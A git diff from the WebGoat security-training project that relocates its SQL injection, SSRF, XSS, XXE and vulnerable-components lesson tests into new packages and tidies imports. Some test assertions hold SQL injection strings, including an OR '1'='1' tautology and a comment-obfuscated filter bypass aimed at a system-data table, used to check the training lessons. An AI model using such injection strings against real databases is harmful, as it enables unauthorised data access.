-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson2Test extends SqlLessonTest {
 
     @Test
@@ -42,4 +41,4 @@ public class SqlInjectionLesson2Test extends SqlLessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java
similarity index 94%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java
index 44e794a07..9bae84bea 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5Test.java
@@ -20,14 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.AfterEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.LessonDataSource;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.container.LessonDataSource;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -37,7 +37,6 @@ import java.sql.SQLException;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson5Test extends SqlLessonTest {
 
     @Autowired
@@ -71,4 +70,4 @@ public class SqlInjectionLesson5Test extends SqlLessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5aTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java
similarity index 96%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5aTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java
index d3c482ac0..1b9f7082a 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson5aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson5aTest.java
@@ -20,12 +20,12 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Disabled;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -34,7 +34,6 @@ import static org.hamcrest.CoreMatchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson5aTest extends SqlLessonTest {
 
     @Test
@@ -85,4 +84,4 @@ public class SqlInjectionLesson5aTest extends SqlLessonTest {
                 .andExpect(jsonPath("$.output", is("malformed string: '1''<br> Your query was: SELECT * FROM user_data WHERE" +
                         " first_name = 'John' and last_name = 'Smith' OR '1' = '1''")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6aTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
similarity index 95%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6aTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
index dec4295ed..34e13b2bb 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6aTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6aTest.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -33,11 +33,6 @@ import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-/**
- * @author nbaars
- * @since 6/15/17.
- */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson6aTest extends SqlLessonTest {
 
     @Test
@@ -97,4 +92,4 @@ public class SqlInjectionLesson6aTest extends SqlLessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", is(true)))
                 .andExpect(jsonPath("$.feedback", containsString("UNION")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6bTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java
similarity index 91%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6bTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java
index aa7999b69..b9d94dbf3 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson6bTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson6bTest.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -32,11 +32,6 @@ import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-/**a
- * @author nbaars
- * @since 6/16/17.
- */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson6bTest extends SqlLessonTest {
 
     @Test
@@ -55,4 +50,4 @@ public class SqlInjectionLesson6bTest extends SqlLessonTest {
                 .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java
similarity index 96%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java
index 66f89c26f..721f7ce45 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson8Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson8Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -37,7 +37,6 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson8Test extends SqlLessonTest {
 
     @Test
@@ -98,4 +97,4 @@ public class SqlInjectionLesson8Test extends SqlLessonTest {
                 .andExpect(jsonPath("lessonCompleted", is(false)))
                 .andExpect(jsonPath("$.output", containsString("feedback-negative")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java
similarity index 98%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java
index 1125358a6..f5b03e1de 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/introduction/SqlInjectionLesson9Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/introduction/SqlInjectionLesson9Test.java
@@ -20,11 +20,11 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.sql_injection.introduction;
+package org.owasp.webgoat.lessons.sql_injection.introduction;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -37,7 +37,6 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author Benedikt Stuhrmann
  * @since 11/07/18.
  */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson9Test extends SqlLessonTest {
 
     private String completedError = "JSON path \"lessonCompleted\"";
@@ -177,4 +176,4 @@ public class SqlInjectionLesson9Test extends SqlLessonTest {
                 .andExpect(jsonPath("$.feedback", is(messages.getMessage("sql-injection.9.success"))))
                 .andExpect(jsonPath("$.output", containsString("300000")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13Test.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java
similarity index 97%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13Test.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java
index 1ff4381cb..924bfa4c2 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlInjectionLesson13Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlInjectionLesson13Test.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -14,7 +14,6 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author nbaars
  * @since 5/21/17.
  */
-@ExtendWith(SpringExtension.class)
 public class SqlInjectionLesson13Test extends SqlLessonTest {
 
     @Test
@@ -100,4 +99,4 @@ public class SqlInjectionLesson13Test extends SqlLessonTest {
 
                 .andExpect(status().isOk()).andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
similarity index 92%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
index 5fcaca951..f05a5c276 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationOnKeywordsTest.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -11,7 +11,6 @@ import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class SqlOnlyInputValidationOnKeywordsTest extends SqlLessonTest {
 
     @Test
@@ -31,4 +30,4 @@ public class SqlOnlyInputValidationOnKeywordsTest extends SqlLessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", is(false)))
                 .andExpect(jsonPath("$.output", containsString("unexpected token: *<br> Your query was: SELECT * FROM user_data WHERE last_name = 'SMITH';\\\\\\/**\\\\\\/*\\\\\\/**\\\\\\/\\\\\\/**\\\\\\/USER_SYSTEM_DATA;--'")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationTest.java b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java
similarity index 91%
rename from webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationTest.java
rename to src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java
index 06252992b..9477fbbaa 100644
--- a/webgoat-lessons/sql-injection/src/test/java/org/owasp/webgoat/sql_injection/mitigation/SqlOnlyInputValidationTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/sql_injection/mitigation/SqlOnlyInputValidationTest.java
@@ -1,8 +1,8 @@
-package org.owasp.webgoat.sql_injection.mitigation;
+package org.owasp.webgoat.lessons.sql_injection.mitigation;
 
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.sql_injection.SqlLessonTest;
+import org.owasp.webgoat.lessons.sql_injection.SqlLessonTest;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -11,7 +11,6 @@ import static org.hamcrest.Matchers.is;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class SqlOnlyInputValidationTest extends SqlLessonTest {
 
     @Test
@@ -31,4 +30,4 @@ public class SqlOnlyInputValidationTest extends SqlLessonTest {
                 .andExpect(jsonPath("$.lessonCompleted", is(false)))
                 .andExpect(jsonPath("$.feedback", containsString("Using spaces is not allowed!")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest1.java b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
similarity index 89%
rename from webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest1.java
rename to src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
index 87d98a491..a87ef50ab 100644
--- a/webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest1.java
+++ b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest1.java
@@ -1,9 +1,10 @@
-package org.owasp.webgoat.ssrf;
+package org.owasp.webgoat.lessons.ssrf;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.ssrf.SSRF;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -21,12 +22,9 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class SSRFTest1 extends LessonTest {
 
-    @Autowired
-    private SSRF ssrf;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(ssrf);
+        when(webSession.getCurrentLesson()).thenReturn(new SSRF());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
diff --git a/webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest2.java b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
similarity index 92%
rename from webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest2.java
rename to src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
index ee74c7024..3820dc704 100644
--- a/webgoat-lessons/ssrf/src/test/java/org/owasp/webgoat/ssrf/SSRFTest2.java
+++ b/src/test/java/org/owasp/webgoat/lessons/ssrf/SSRFTest2.java
@@ -20,12 +20,13 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.ssrf;
+package org.owasp.webgoat.lessons.ssrf;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.ssrf.SSRF;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -43,12 +44,9 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 @ExtendWith(SpringExtension.class)
 public class SSRFTest2 extends LessonTest {
 
-    @Autowired
-    private SSRF ssrf;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(ssrf);
+        when(webSession.getCurrentLesson()).thenReturn(new SSRF());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
diff --git a/webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLessonTest.java b/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
similarity index 94%
rename from webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLessonTest.java
rename to src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
index ad5db3f03..dd47a1400 100644
--- a/webgoat-lessons/vulnerable-components/src/test/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLessonTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/vulnerable_components/VulnerableComponentsLessonTest.java
@@ -20,12 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.vulnerable_components;
+package org.owasp.webgoat.lessons.vulnerable_components;
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.StreamException;
 import org.junit.jupiter.api.Disabled;
 import org.junit.jupiter.api.Test;
+import org.owasp.webgoat.lessons.vulnerable_components.Contact;
+import org.owasp.webgoat.lessons.vulnerable_components.ContactImpl;
 
 import static org.junit.jupiter.api.Assertions.assertNotNull;
 import static org.junit.jupiter.api.Assertions.assertThrows;
@@ -76,4 +78,4 @@ public class VulnerableComponentsLessonTest {
         Exception e = assertThrows(StreamException.class, ()->((Contact)xstream.fromXML("bullssjfs")).getFirstName());
         assertTrue(e.getCause().getMessage().contains("START_DOCUMENT"));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java b/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
similarity index 96%
rename from webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java
rename to src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
index 3f2c0f48e..f137c66d2 100644
--- a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/CrossSiteScriptingLesson1Test.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/CrossSiteScriptingLesson1Test.java
@@ -21,22 +21,22 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
-
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
-import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
-import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+package org.owasp.webgoat.lessons.xss;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
 /**
  *
  * @author Angel Olle Blazquez
diff --git a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingTest.java b/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
similarity index 93%
rename from webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingTest.java
rename to src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
index ca31c7938..17163e109 100644
--- a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/DOMCrossSiteScriptingTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/DOMCrossSiteScriptingTest.java
@@ -20,19 +20,20 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.xss.CrossSiteScripting;
+import org.owasp.webgoat.lessons.xss.DOMCrossSiteScripting;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.mockito.Mockito.lenient;
-import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
diff --git a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/StoredXssCommentsTest.java b/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
similarity index 96%
rename from webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/StoredXssCommentsTest.java
rename to src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
index 3995d4fe3..a8db45a36 100644
--- a/webgoat-lessons/cross-site-scripting/src/test/java/org/owasp/webgoat/xss/StoredXssCommentsTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xss/StoredXssCommentsTest.java
@@ -20,15 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.xss;
+package org.owasp.webgoat.lessons.xss;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.xss.stored.StoredXssComments;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.xss.stored.StoredXssComments;
 import org.springframework.http.MediaType;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.MvcResult;
diff --git a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/BlindSendFileAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
similarity index 62%
rename from webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/BlindSendFileAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
index ae94abffe..ed50c4a7d 100644
--- a/webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/xxe/BlindSendFileAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/xxe/BlindSendFileAssignmentTest.java
@@ -1,45 +1,34 @@
-package org.owasp.webgoat.xxe;
+package org.owasp.webgoat.lessons.xxe;
 
+import com.fasterxml.jackson.databind.ObjectMapper;
 import com.github.tomakehurst.wiremock.WireMockServer;
 import com.github.tomakehurst.wiremock.client.WireMock;
 import com.github.tomakehurst.wiremock.verification.LoggedRequest;
 import org.hamcrest.CoreMatchers;
+import org.hamcrest.Matchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
-import org.springframework.beans.factory.annotation.Autowired;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.test.context.junit.jupiter.SpringExtension;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.springframework.http.MediaType;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 import org.springframework.test.web.servlet.setup.MockMvcBuilders;
 
 import java.io.File;
 import java.util.List;
 
-import static com.github.tomakehurst.wiremock.client.WireMock.*;
+import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
+import static com.github.tomakehurst.wiremock.client.WireMock.getRequestedFor;
+import static com.github.tomakehurst.wiremock.client.WireMock.urlMatching;
 import static com.github.tomakehurst.wiremock.core.WireMockConfiguration.options;
 import static org.assertj.core.api.Assertions.assertThat;
 import static org.mockito.Mockito.when;
